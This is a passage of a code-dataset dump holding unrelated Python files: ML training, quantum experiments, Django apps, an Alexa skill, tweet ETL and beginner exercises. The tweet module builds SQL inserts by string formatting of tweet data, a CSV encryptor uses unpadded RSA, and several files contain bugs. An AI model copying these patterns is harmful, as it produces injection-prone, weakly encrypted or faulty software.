'n2_5_50')\n if not os.path.exists(exp_dir):\n os.makedirs(exp_dir)\n writer = SummaryWriter(exp_dir)\n\n # according to the results of test same\n Best_results = dict()\n Best_results['def_loss'] = 1000000.0\n 
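# NOTE: loss entries start from a large sentinel value so the first test_same\n    # evaluation always improves them; accuracy entries start from 0.0 so any\n    # positive accuracy replaces them, and the epoch markers start from -1\n    # (meaning no best epoch recorded yet).\n    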
Best_results['epoch_def_loss'] = -1\n Best_results['total_loss'] = 1000000.0\n Best_results['epoch_total_loss'] = -1\n Best_results['ter_accs'] = 0.0\n Best_results['epoch_ter_accs'] = -1\n Best_results['pro_accs'] = 0.0\n Best_results['epoch_pro_accs'] = -1\n\n TRAIN_DATA_PATH = 'Data/train_5_50.pik'\n with open(TRAIN_DATA_PATH, 'rb', ) as f:\n train_data = pickle.load(f)\n\n TEST_SAME_DATA_PATH = 'Data/test_5_50.pik'\n with open(TEST_SAME_DATA_PATH, 'rb', ) as f:\n test_same_data = pickle.load(f)\n\n TEST_DIF_DATA_PATH = 'Data/test_10_50.pik'\n with open(TEST_DIF_DATA_PATH, 'rb', ) as f:\n test_dif_data = pickle.load(f)\n\n CUDA_VISIBLE_DEVICES = '1'\n print('Current GPU index: ' + CUDA_VISIBLE_DEVICES)\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = CUDA_VISIBLE_DEVICES\n\n if torch.cuda.is_available():\n cuda_flag = True\n else:\n cuda_flag = False\n\n maze_core = MazeCore()\n npi = NPI(maze_core, CONFIG)\n if cuda_flag:\n npi = npi.cuda()\n\n print_net(npi)\n\n parameters = filter(lambda p: p.requires_grad,\n npi.parameters())\n optimizer = torch.optim.SGD(parameters,\n lr=0.0001,\n momentum=0.9,\n nesterov=True,\n weight_decay=5e-4)\n # optimizer = torch.optim.Adam(parameters, lr=0.0001, betas=(0.5, 0.999))\n lr_schedulers = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer,\n T_max=max_num_epochs)\n\n for curr_epoch in range(start_epoch, max_num_epochs + 1):\n mode = 'train'\n run_epoch(npi, mode, train_data, writer)\n\n lr_schedulers.step(curr_epoch)\n if curr_epoch % 2 == 0:\n model_name = 'npi_' + str(curr_epoch) + '.pth'\n save_path = os.path.join(exp_dir, model_name)\n npi.save_network(save_path, cuda_flag)\n if cuda_flag:\n npi = npi.cuda()\n\n mode = 'test_same'\n cur_results = run_epoch(npi, mode, test_same_data, writer)\n\n def_loss, total_loss, ter_accs, pro_accs = cur_results\n\n if def_loss < Best_results['def_loss']:\n Best_results['def_loss'] = def_loss\n Best_results['epoch_def_loss'] = curr_epoch\n if total_loss < Best_results['total_loss']:\n Best_results['total_loss'] = total_loss\n Best_results['epoch_total_loss'] = curr_epoch\n if ter_accs > Best_results['ter_accs']:\n Best_results['ter_accs'] = ter_accs\n Best_results['epoch_ter_accs'] = curr_epoch\n if pro_accs > Best_results['pro_accs']:\n Best_results['pro_accs'] = pro_accs\n Best_results['epoch_pro_accs'] = curr_epoch\n\n mode = 'test_dif'\n run_epoch(npi, mode, test_dif_data, writer)\n\n save_path = os.path.join(exp_dir, 'npi_last.pth')\n npi.save_network(save_path, cuda_flag)\n if cuda_flag:\n npi = npi.cuda()\n\n for key, val in Best_results.items():\n if key.find('epoch') != -1:\n print('Best %s for test same at %d epoch' % (key, val))\n else:\n print('Best %s for test same: %f' % (key, val))\n\n\n\n\n\n","sub_path":"NPI_Maze/train_n2_5_50.py","file_name":"train_n2_5_50.py","file_ext":"py","file_size_in_byte":9749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"547904488","text":"# -*- coding: utf-8 -*-\n# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.7.1\n# kernelspec:\n# display_name: gp-experiments\n# language: python\n# name: gp-experiments\n# ---\n\n# # $\\vert 0 \\rangle$ state decaying\n#\n# ## qubit: 0\n\n# +\nfrom pprint import pprint\nfrom datetime import date\n\nfrom experiments.utils import get_IBM_backend, pickle_load\nfrom experiments.waiting_duration.benchmarks import 
prepare_singleBench\nfrom experiments.waiting_duration import execute_bench, save_jobid_path\nfrom experiments.waiting_duration import calculate_results, save_data_path\n# -\n\n\n# user input\nbackend_name = \"ibmq_toronto\"\nnseed = 5\ndate = \"2020-11-24\"\ninitial_layout = [0]\n\n# +\n# define backends\nbackend = get_IBM_backend(backend_name, reservations=True)\nsimulator = get_IBM_backend(\"ibmq_qasm_simulator\")\n\n# type of experiments \nexp_type = \"single_qubit\"\ninitial_state=\"zero_state\"\n# -\n\n# ## backend configuratiaon\n\n# +\nprint(\"####################### dutation time #######################\")\ndt = backend.configuration().dt\nprint(\"1 dt = \", dt, \" sec\")\nprint(\" = \", dt * 10**10, \"ns\")\n\nprint()\n\nprint(\"####################### gate length #######################\")\ncoupling_map = backend.configuration().coupling_map\nprop = backend.properties()\ncx_durations = []\nfor coup in coupling_map:\n length = prop.gate_length(\"cx\", coup)\n cx_durations.append(length)\n print(coup, length)\n\nimport numpy as np\nprint(\"##################################################\")\nprint(\"max: \", max(cx_durations), \" (sec)\")\nprint(\"min: \", min(cx_durations), \" (sec)\")\nprint(\"mean: \", np.mean(cx_durations), \" (sec)\")\n# -\n\n# ## Send job\n\n# max(dt) = 1E6\njobid_path_e6 = save_jobid_path(date, \"e6\", initial_state, initial_layout)\ndelay_duration_e6 = [0, 50000, 100000, 150000, 200000, 250000, 300000, 350000, 400000, 450000, 500000, 550000, 600000, 650000, 700000, 750000, 800000, 850000, 900000, 950000, 1000000]\n\n# +\n# qc = prepare_singleBench(initial_state, \"e6\")\n# execute_bench(\n# qc, \n# backend=backend, \n# simulator=simulator, \n# initial_layout=initial_layout, \n# save_path = jobid_path_e6,\n# delay_duration_list=delay_duration_e6,\n# nseed=nseed, \n# )\n# -\n\n# max(dt) = 1E5\n# delay dulation label\njobid_path_e5 = save_jobid_path(date, \"e5\", initial_state, initial_layout)\ndelay_duration_e5 = [0, 5000, 10000, 15000, 20000, 25000, 30000, 35000, 40000, 45000, 50000, 55000, 60000, 65000, 70000, 75000, 80000, 85000, 90000, 95000, 100000]\n\n# +\n# qc = prepare_singleBench(initial_state, \"e5\")\n# execute_bench(\n# qc, \n# backend=backend, \n# simulator=simulator, \n# initial_layout=initial_layout, \n# save_path = jobid_path_e5,\n# delay_duration_list=delay_duration_e5,\n# nseed=nseed, \n# )\n# -\n\n# max(dt) = 1E4\n# delay dulation label\njobid_path_e4 = save_jobid_path(date, \"e4\", initial_state, initial_layout)\ndelay_duration_e4 = [0, 500, 1000, 1500, 2000, 2500, 3000, 3500, 4000, 4500, 5000, 5500, 6000, 6500, 7000, 7500, 8000, 8500, 9000, 9500, 10000]\n\n# +\n# qc = prepare_singleBench(initial_state, \"e4\")\n# execute_bench(\n# qc, \n# backend=backend, \n# simulator=simulator, \n# initial_layout=initial_layout, \n# save_path = jobid_path_e4,\n# delay_duration_list=delay_duration_e4,\n# nseed=nseed, \n# )\n# -\n\n# ## calculate results\n\nsavedata_path_e6 = save_data_path(date, \"e6\", initial_state, initial_layout)\n\n# +\n# e6 = calculate_results(delay_duration_e6, jobid_path_e6, savedata_path_e6, backend, simulator, nseed)\n# pprint(e6)\n# -\n\nsavedata_path_e5 = save_data_path(date, \"e5\", initial_state, initial_layout)\n\n# +\n# e5 = calculate_results(delay_duration_e5, jobid_path_e5, savedata_path_e5, backend, simulator, nseed)\n# pprint(e5)\n# -\n\nsavedata_path_e4 = save_data_path(date, \"e4\", initial_state, initial_layout)\n\n# +\n# e4 = calculate_results(delay_duration_e4, jobid_path_e4, savedata_path_e4, backend, 
simulator, nseed)\n# pprint(e4)\n# -\n\nfrom experiments.waiting_duration import plot_decay, save_plot_path\n\nsave_plot_path_e6 = save_plot_path(date, \"e6\", initial_state, initial_layout)\ne6 = pickle_load(savedata_path_e6)\nplot_decay(e6, delay_duration_e6, save_plot_path_e6, ymin=0, ymax=0.75)\n\nsave_plot_path_e5 = save_plot_path(date, \"e5\", initial_state, initial_layout)\ne5 = pickle_load(savedata_path_e5)\nplot_decay(e5, delay_duration_e5, save_plot_path_e5, ymin=0, ymax=0.5)\n\nsave_plot_path_e4 = save_plot_path(date, \"e4\", initial_state, initial_layout)\ne4 = pickle_load(savedata_path_e4)\nplot_decay(e4, delay_duration_e4, save_plot_path_e4, ymin=0, ymax=0.25)\n\n\n","sub_path":"waiting_duration/experiments/ibmq_toronto/single_qubit/20201122_zerostate_0_ibmq_toronto.py","file_name":"20201122_zerostate_0_ibmq_toronto.py","file_ext":"py","file_size_in_byte":4821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"83043760","text":"from textblob import TextBlob\nimport pyodbc\nfrom config import * \nimport preprocessor as p\n\n\nimport json\n\nfrom utils import *\n\ndef process_data(data):\n users = process_users(data)\n tweets = process_tweets(data)\n\n\ndef process(data):\n users, tweets, times, places = [], [], [], []\n\n for item in data:\n try:\n user = item[\"user\"]\n users.append((user[\"id\"], user[\"screen_name\"], user[\"name\"], clean(user[\"description\"]),\n user[\"lang\"], parse_datetime(user[\"created_at\"]), user[\"time_zone\"], user[\"location\"]))\n except Exception as e:\n pass \n\n try:\n tweets.append((item[\"id\"], clean(item[\"text\"]), parse_datetime(item[\"created_at\"]),\n get_source(item[\"source\"]), item[\"lang\"], TextBlob(clean(item[\"text\"])).polarity,\n if_exists_else_zero(item[\"in_reply_to_status_id\"]),\n if_exists_else_zero(item[\"in_reply_to_user_id\"]),\n if_exists_else_space(item[\"in_reply_to_screen_name\"])))\n except Exception as e:\n pass\n\n try:\n t = datetime.datetime.now().timestamp()\n seconds, minutes, hours, day, month, year = time_list(idem[\"created_at\"])\n\n times.append((t, seconds, minutes, hours, day, month, year))\n except Exception as e:\n pass \n \n\ndef insert_place(data):\n data = data[\"place\"]\n place_id = if_exists_else_zero(data[\"id\"]) if data else 0\n place_country_code = if_exists_else_space(data[\"country_code\"]) if data else \"\"\n place_country = if_exists_else_space(data[\"country\"]) if data else \"\"\n place_name = if_exists_else_space(data[\"name\"]) if data else \"\"\n place_full_name = if_exists_else_space(data[\"full_name\"]) if data else \"\"\n place_type = if_exists_else_space(data[\"place_type\"]) if data else \"\"\n\n query = \"insert into place_dim values ({}, '{}', '{}', '{}', '{}', '{}')\".format(\n place_id, place_country_code, place_country,\n place_name, place_full_name, place_type\n )\n\n return query\n\n\ndef insert_tweet_fact(data, tweet_dim_id, user_dim_id, time_dim_id, place_dim_id):\n try:\n retweet_count = data[\"retweet_count\"]\n favorite_count = data[\"favorite_count\"]\n\n query = \"insert into tweet_fact values({}, {}, {}, {}, {}, {});\".format(\n tweet_dim_id, user_dim_id, time_dim_id, place_dim_id, retweet_count, favorite_count\n )\n\n cursor.execute(query)\n except Exception as e: \n print(e)\n\n\ndef insert_user_fact(data, user_dim_id, time_dim_id):\n try:\n data = data[\"user\"]\n friends_count = data[\"friends_count\"]\n followers_count = data[\"followers_count\"]\n listed_count = data[\"listed_count\"]\n 
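# per-user engagement counters captured for this snapshot; they populate\n        # the measure columns of the user_fact row inserted below\n        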
statuses_count = data[\"statuses_count\"]\n favourites_count = data[\"favourites_count\"]\n\n query = \"insert into user_fact values ({}, {}, {}, {}, {}, {}, {})\".format(\n user_dim_id, time_dim_id, friends_count, followers_count, listed_count,\n statuses_count, favourites_count\n )\n\n cursor.execute(query)\n except Exception as e:\n print(e)\n","sub_path":"dummy/process_.py","file_name":"process_.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"336734162","text":"from django.shortcuts import render\nfrom .models import Topic, Entry\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.urls import reverse\nfrom .forms import TopicForm,EntryForm\nfrom django.contrib.auth.decorators import login_required\n# Create your views here.\n#显示主页\ndef index(request):\n return render(request,'webapp/index.html')\n\n#显示主题\n@login_required\ndef topics(request):\n topics=Topic.objects.filter(owner=request.user).order_by('date_added')\n context={'topics':topics}\n return render(request,'webapp/topics.html',context)\n\n#显示单个主题及其所有条目\n@login_required\ndef topic(request, topic_id):\n topic=Topic.objects.get(id=topic_id)\n if topic.owner!=request.user:\n raise Http404\n\n entries=topic.entry_set.order_by('-date_added')\n context={'topic':topic,'entries':entries}\n return render(request, 'webapp/topic.html',context)\n\n\n#添加新主题\n@login_required\ndef new_topic(request):\n if request.method!='POST':\n #未提交数据:创建一个新表单\n form=TopicForm()\n else:\n #POST提交的数据,对数据进行处理\n form=TopicForm(request.POST)\n if form.is_valid():\n new_topic=form.save(commit=False)\n new_topic.owner=request.user\n new_topic.save()\n return HttpResponseRedirect(reverse('webapp:topics'))\n context={'form':form}\n return render(request,'webapp/new_topic.html',context)\n\n@login_required\ndef edit_entry(request, entry_id):\n #编辑目录\n entry=Entry.objects.get(id=entry_id)\n topic=entry.topic\n if topic.owner!=request.user:\n raise Http404\n if request.method!='POST':\n form=EntryForm(instance=entry)\n else:\n form=EntryForm(instance=entry, data=request.POST)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('webapp:topic', args=[topic.id]))\n context={'entry':entry, 'topic':topic, 'form':form}\n return render(request, 'webapp/edit_entry.html',context)\n\n\n@login_required\ndef new_entry(request, topic_id):\n #在特定主题中添加目录\n topic=Topic.objects.get(id=topic_id)\n\n if request.method!='POST':\n #未提交数据,创建一个空表单\n form=EntryForm()\n else:\n #POST提交的数据,对数据进行处理\n form=EntryForm(data=request.POST)\n if form.is_valid():\n new_entry=form.save(commit=False)\n new_entry.topic=topic\n new_entry.save()\n return HttpResponseRedirect(reverse('webapp:topic',args=[topic_id]))\n context={'topic':topic, 'form':form}\n return render(request,'webapp/new_entry.html',context)","sub_path":"webapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"113549722","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 24 14:31:36 2019\r\n\r\n@author: Training29\r\n\"\"\"\r\n\r\n#### 1. Write a python program to create a Dictionary. #########\r\n\r\nstring = 'vijayakumar' \r\nmy_dict = {}\r\nfor letter in string:\r\n my_dict[letter] = my_dict.get(letter, 0) + 1\r\nprint(my_dict)\r\n\r\n### 2. Write a python program to access the values in the Dictionary. 
###\r\ndict = {'name': 'vijay', 'age': 27}\r\nprint(dict['name'])\r\nprint(dict.get('age'))\r\n\r\n### 3. Write a python program to update the above created dictionary. ####\r\na = {'name': 'vijay','age': 27}\r\nb = {'name': 'raj','address': 'ssss'}\r\na.update(b)\r\nprint(a)\r\n\r\n###4. Write a python program to delete the above created dictionary. ####\r\na = {'name': 'vijay','age': 27,'address': 'ssss'}\r\ndel a['name']\r\ndel a['address']\r\ndel a['age']\r\nprint(a)\r\n#### OTHER METHOD #####\r\na = {'name': 'vijay','age': 27,'address': 'ssss'}\r\na.clear()\r\nprint(a)\r\n\r\n### 5. Write a python code to copy the entire dictionary into a new dictionary.#####\r\n\r\na = {'name': 'vijay','age': 27,'address': 'ssss'}\r\nb = a.copy()\r\nprint(b)\r\n\r\n###6. Write a python code to delete keys from the dictionary.#########\r\n\r\na = {'name': 'vijay','age': 27,'address': 'ssss'}\r\ndel a['age']\r\nprint(a)\r\n\r\n#### OTHER METHOD #####\r\na = {'name': 'vijay','age': 27,'address': 'ssss'}\r\n\r\nif 'age' in a:\r\n del a['age']\r\n print(a)\r\n \r\n ##### 7. Write a python code to sort the elements in the dictionary. #####\r\n a = {'vijay': 27,'ajay': 25,'ravi': 22, 'siva': 26}\r\n for n in sorted(a):\r\n print(n, a[n])\r\n \r\n\r\n\r\n\r\n","sub_path":"Python/Dictonary.py","file_name":"Dictonary.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"515549027","text":"import cv2 as cv\nimport mediapipe as mp\nmp_drawing = mp.solutions.drawing_utils\nmp_face_mesh = mp.solutions.face_mesh\n\nface_mesh = mp_face_mesh.FaceMesh(\n min_detection_confidence=0.5, min_tracking_confidence=0.5)\ndrawing_spec = mp_drawing.DrawingSpec(color=(128,128,128), thickness=1, circle_radius=1)\ncap = cv.VideoCapture(0)\n\nwhile cap.isOpened():\n success, image = cap.read()\n if not success:\n break\n\n image = cv.cvtColor(cv.flip(image, 1), cv.COLOR_BGR2RGB)\n image.flags.writeable = False\n results = face_mesh.process(image)\n\n image.flags.writeable = True\n image = cv.cvtColor(image, cv.COLOR_RGB2BGR)\n if results.multi_face_landmarks:\n for face_landmarks in results.multi_face_landmarks:\n mp_drawing.draw_landmarks(\n image=image,\n landmark_list=face_landmarks,\n connections=mp_face_mesh.FACE_CONNECTIONS,\n landmark_drawing_spec=drawing_spec,\n connection_drawing_spec=drawing_spec)\n cv.imshow('MediaPipe FaceMesh', image)\n if cv.waitKey(1) & 0xFF == ord('q'):\n break\nface_mesh.close()\ncap.release()\n","sub_path":"mediapipe/face/face_mesh.py","file_name":"face_mesh.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"606334130","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n if l1 == None:\n return l2\n if l2 == None:\n return l1\n head = ListNode(None)\n l3 = head\n while l1 and l2:\n if l1.val < l2.val:\n l3.next = l1\n l1 = l1.next\n l3 = l3.next\n else:\n l3.next = l2\n l2 = l2.next\n l3 = l3.next\n l3.next = l1 if l1 else l2\n return head.next\n\n\n\n\n\nif __name__ == '__main__':\n sol = Solution()\n output = sol.mergeTwoLists()\n print(output)","sub_path":"easy/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} 
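Editor's note on the preceding record (seq_id 606334130, easy/21.py): its __main__ block calls sol.mergeTwoLists() with no arguments, so the file raises a TypeError when run. Below is a minimal driver sketch for that record's Solution class; it assumes the ListNode and Solution definitions from the record are in scope, and the build_list / to_pylist helpers are illustrative additions, not part of the original sample.

# Sketch of a working driver for the mergeTwoLists record above.
# Assumes ListNode and Solution exactly as defined in seq_id 606334130;
# build_list and to_pylist are hypothetical helpers added for illustration.

def build_list(values):
    # Build a singly linked list from a Python list and return its head (or None).
    head = None
    for v in reversed(values):
        node = ListNode(v)
        node.next = head
        head = node
    return head

def to_pylist(head):
    # Flatten a linked list back into a Python list for easy printing.
    out = []
    while head is not None:
        out.append(head.val)
        head = head.next
    return out

if __name__ == '__main__':
    sol = Solution()
    merged = sol.mergeTwoLists(build_list([1, 2, 4]), build_list([1, 3, 4]))
    print(to_pylist(merged))  # expected output: [1, 1, 2, 3, 4, 4]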
+{"seq_id":"34802974","text":"from mongoengine import *\nimport datetime\nfrom pprint import pprint\n\n\nconnect('IECA',host='localhost', port=27017)\n\n#Modelo\nclass Post(Document):\n _nombre = StringField(required=True, max_length=200)\n _correo = StringField(required=True, max_length=50)\n _contrasena = StringField(required=True, max_length=50)\n _materias = ListField(StringField(required=True,max_length=20))\n _published = DateField(default=datetime.datetime.now(None))\n\nprint('Ingreso de estudiantes a base de datos IECA\\n')\nprint('1.- Agregar estudiante')\nprint('2.- Mostrar estudiantes')\nprint('3.- Actualizar estudiantes')\nprint('4.- Eliminar estudiante')\nprint('5.- Salir\\n')\nselect = int(input(\"Seleccion: \"))\n\n\n\n\nif __name__ == '__main__':\n\n while select < 5: #Crear objetos con ID nuevo en DB\n\n\n if select==1:\n\n post = Post(\n _nombre='',\n _correo='',\n _contrasena='',\n _materias=['']\n )\n post._nombre = input('Ingresa un nombre: ')\n post._correo = input('Ingresa correo: ')\n post._contrasena = input('Ingresa contraseña: ')\n input_string = input(\"Ingresa materias separadas por coma: \")\n materias_lista = input_string.split(\",\")\n post._materias = materias_lista\n post.save()\n\n select = int(input(\"Seleccion: \"))\n\n elif select == 2:\n\n for p in Post.objects:\n pprint(p._nombre)\n pprint(p._correo)\n pprint(p._materias)\n\n select = int(input(\"Seleccion: \"))\n\n elif select == 3:\n pass\n\n","sub_path":"StudentsIO.py","file_name":"StudentsIO.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"536480353","text":"from __future__ import with_statement\nimport urllib\nimport webapp2\nimport csv\nfrom StringIO import StringIO\n\nfrom google.appengine.ext import blobstore\nfrom google.appengine.ext.webapp import blobstore_handlers\nfrom google.appengine.api import files\nfrom Crypto.PublicKey import RSA\nfrom Crypto import Random\n\nclass MainHandler(webapp2.RequestHandler):\n def get(self):\n self.response.out.write(\n '''\n \n \n
\n \n Enter Key: \n \n \n \n \n '''\n )\n\nclass UploadHandler(webapp2.RequestHandler):\n \n \n @staticmethod\n def crypt(plaintext, key):\n # Use a fixed private key here to get a deterministic result for testing\n key = RSA.importKey(key)\n enc_data = key.encrypt(plaintext, 32)\n \n # encode the byte data into ASCII data so that it could be printed out in the browser\n return enc_data[0].encode('base64')\n \n def old_crypt(self, plaintext):\n # Use a fixed private key here to get a deterministic result for testing\n public_key = key.publickey()\n enc_data = public_key.encrypt(plaintext, 32)\n \n # encode the byte data into ASCII data so that it could be printed out in the browser\n return enc_data[0].encode('base64')\n\n def post(self):\n rows=self.request.POST.get('file').value\n key = self.request.POST.get('key')\n file_name = files.blobstore.create(mime_type='text/plain')\n with files.open(file_name, 'a') as f:\n writer = csv.writer(f , delimiter=',')\n for row in csv.reader(StringIO(rows), delimiter=','):\n if len(row) > 1:\n row[1] = self.crypt(row[1], key)\n writer.writerow(row)\n files.finalize(file_name)\n \n blobs = blobstore.BlobInfo.all()\n blob_links = [\n 'File %s
' % (blob.key(), index+1)\n for index, blob in enumerate(blobs)\n ]\n \n self.response.out.write(\n '''\n \n \n %s\n \n \n ''' % \"\".join(blob_links)\n )\n\nclass ServeHandler(blobstore_handlers.BlobstoreDownloadHandler):\n def get(self, resource):\n resource = str(urllib.unquote(resource))\n blob_info = blobstore.BlobInfo.get(resource)\n self.send_blob(blob_info)\n\napp = webapp2.WSGIApplication([('/', MainHandler),\n ('/upload', UploadHandler),\n ('/serve/([^/]+)?', ServeHandler)],\n debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"406560263","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\ndef is_even_len(string: str) -> bool: # nb caractères est pair ? cad si len Divisible par 2 sans reste (modulo) => pair\n if len(string) % 2 == 0:\n return True\n return False\n\n\ndef remove_third_char(string: str) -> str: # str[0:2]+[3:]\n return string[0:2] + string[3:]\n\n\ndef replace_char(string: str, old_char: str, new_char: str) -> str: #À refaire\n position_of_old_char = string.index(old_char) # donne position/l'index qui est un int. Alternative for loop and if statement pcq comme c'est, pas capable d'identifier pls old_char\n string = string[:position_of_old_char] + new_char + string[position_of_old_char+1 :]\n return string\n\ndef get_number_of_char(string: str, char: str) -> int:\n number_of_char = 0\n for i in string:\n if i == char:\n number_of_char += 1\n return number_of_char\n\n # Solution that didn't work\n # positions_of_char = (string.index(char))\n # number_of_char = len(f'{positions_of_char}')\n # return number_of_char\n\n\ndef get_number_of_words(sentence: str, word: str) -> int:\n number_of_word = 0\n sentence = sentence.split() #sépare sentence en une liste de mots ['ceci', 'est', 'une', 'phrase', 'test']\n for i in sentence: # pourquoi ecq for word in sentence: ne fonctionne pas\n if i == word:\n number_of_word += 1\n return number_of_word\n\ndef main() -> None:\n chaine = \"Bonjour!\"\n if is_even_len(chaine):\n print(f\"Le nombre de caractère dans la chaine {chaine} est pair\")\n else:\n print(f\"Le nombre de caractère dans la chaine {chaine} est impair\")\n\n chaine = \"salut monde!\"\n print(f\"On supprime le 3e caractère dans la chaine: {chaine}. Résultat : {remove_third_char(chaine)}\")\n\n chaine = \"hello world!\"\n print(f\"On remplace le caractère w par le caractère z dans la chaine: {chaine}. 
Résultat : {replace_char(chaine, 'w', 'z')}\")\n\n print(f\"Le nombre d'occurrence de l dans 'hello world' est : {get_number_of_char(chaine, 'l')}\")\n\n chaine = \"Baby shark doo doo doo doo doo doo\"\n print(f\"L'occurence du mot doo dans la chaine {chaine} est: {get_number_of_words(chaine, 'doo')}\")\n\n\nif __name__ == '__main__':\n main()\n\n# complet 2\n","sub_path":"exercice.py","file_name":"exercice.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"89655081","text":"from django import forms\r\n\r\nfrom .models import Anuncio\r\nfrom .validators import validate_category\r\n\r\n\r\nclass AnuncioCreateForm(forms.ModelForm):\r\n class Meta:\r\n model = Anuncio\r\n fields = [\r\n 'name',\r\n 'cidade',\r\n 'transacao',\r\n 'tipo',\r\n 'quartos',\r\n 'banheiros',\r\n 'vagas',\r\n 'slug',\r\n ]\r\n\r\n def clean_name(self):\r\n name = self.cleaned_data.get(\"name\")\r\n if name == \"Hello\":\r\n raise forms.ValidationError(\"Not a valid name\")\r\n return name\r\n\r\n # def clean_email(self):\r\n # email = self.cleaned_data.get(\"email\")\r\n # if \".edu\" in email:\r\n # raise forms.ValidationError(\"We do not accept edu emails\")\r\n # return email","sub_path":"imoveis/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"258478072","text":"from ask_sdk_core.skill_builder import SkillBuilder\nimport json\n\nsb = SkillBuilder()\nfrom ask_sdk_core.utils import is_request_type\nfrom ask_sdk_model.ui import SimpleCard\nfrom ask_sdk_model import Response\nfrom ask_sdk_model.interfaces.alexa.presentation.apl import (\n RenderDocumentDirective, ExecuteCommandsDirective, SpeakItemCommand,\n AutoPageCommand, HighlightMode)\n\nfrom ask_sdk_core.utils import is_intent_name\n\ndef _load_apl_document(file_path):\n # type: (str) -> Dict[str, Any]\n \"\"\"Load the apl json document at the path into a dict object.\"\"\"\n with open(file_path) as f:\n return json.load(f)\n\n@sb.request_handler(can_handle_func=is_request_type(\"LaunchRequest\"))\ndef launch_request_handler(handler_input):\n speech_text = \"Welcome to the Alexa Skills Kit, you can say hello!\"\n\n handler_input.response_builder.speak(speech_text).set_should_end_session(\n False).add_directive(\n RenderDocumentDirective(\n token=\"pagerToken\",\n document=_load_apl_document(\"hello_world_apl_template.json\")['document'],\n datasources=_load_apl_document(\"hello_world_apl_template.json\")['dataSources']\n )\n )\n return handler_input.response_builder.response\n\n\n@sb.request_handler(can_handle_func=is_intent_name(\"HelloWorldIntent\"))\ndef hello_world_intent_handler(handler_input):\n speech_text = \"Hello World!\"\n\n handler_input.response_builder.speak(speech_text).set_should_end_session(\n True).add_directive(RenderDocumentDirective(\n token=\"pagerToken\",\n document=_load_apl_document(\"hello_world_apl_template.json\")['document'],\n datasources=_load_apl_document(\"hello_world_apl_template.json\")['dataSources']\n )\n )\n return handler_input.response_builder.response\n\n@sb.request_handler(can_handle_func=is_intent_name(\"AMAZON.HelpIntent\"))\ndef help_intent_handler(handler_input):\n speech_text = \"You can say hello to me!\"\n\n handler_input.response_builder.speak(speech_text).ask(speech_text).set_card(\n SimpleCard(\"Hello World\", speech_text)).add_directive(\n RenderDocumentDirective(\n 
token=\"pagerToken\",\n document=_load_apl_document(\"hello_world_apl_template.json\")['document'],\n datasources=_load_apl_document(\"hello_world_apl_template.json\")['dataSources']\n )\n )\n return handler_input.response_builder.response\n\n@sb.request_handler(\n can_handle_func=lambda input :\n is_intent_name(\"AMAZON.CancelIntent\")(input) or\n is_intent_name(\"AMAZON.StopIntent\")(input))\ndef cancel_and_stop_intent_handler(handler_input):\n speech_text = \"Goodbye!\"\n\n handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(\"Hello World\", speech_text))\n return handler_input.response_builder.response\n\n@sb.request_handler(can_handle_func=is_request_type(\"SessionEndedRequest\"))\ndef session_ended_request_handler(handler_input):\n #any cleanup logic goes here\n\n return handler_input.response_builder.response\n\n@sb.exception_handler(can_handle_func=lambda i, e: True)\ndef all_exception_handler(handler_input, exception):\n # Log the exception in CloudWatch Logs\n print(exception)\n\n speech = \"Sorry, I didn't get it. Can you please say it again!!\"\n handler_input.response_builder.speak(speech).ask(speech)\n return handler_input.response_builder.response\n\nhandler = sb.lambda_handler()\n\n","sub_path":"hello-world-apl-alexa/hello-world-apl.py","file_name":"hello-world-apl.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"156884153","text":"class Player:\n \n def __init__(self, name):\n self.total_points = 0\n self.name = name\n \n def call_total_points(self):\n print(f'total points: {self.total_points}')\n \n def pick_card(self, card, isOpenCall=True):\n if isOpenCall:\n print(f'picked card: {card}')\n else:\n print('picked card: ???')\n \n self.point = self.conv_card2point(card)\n self.total_points += self.point\n \n def conv_card2point(self, card):\n tmp = card[1:]\n try:\n val = int(tmp)\n except:\n if tmp == 'A':\n val = 1\n elif tmp == 'J' or tmp == 'Q' or tmp == 'K':\n val = 10\n else:\n assert False ('card type is wrond')\n \n return 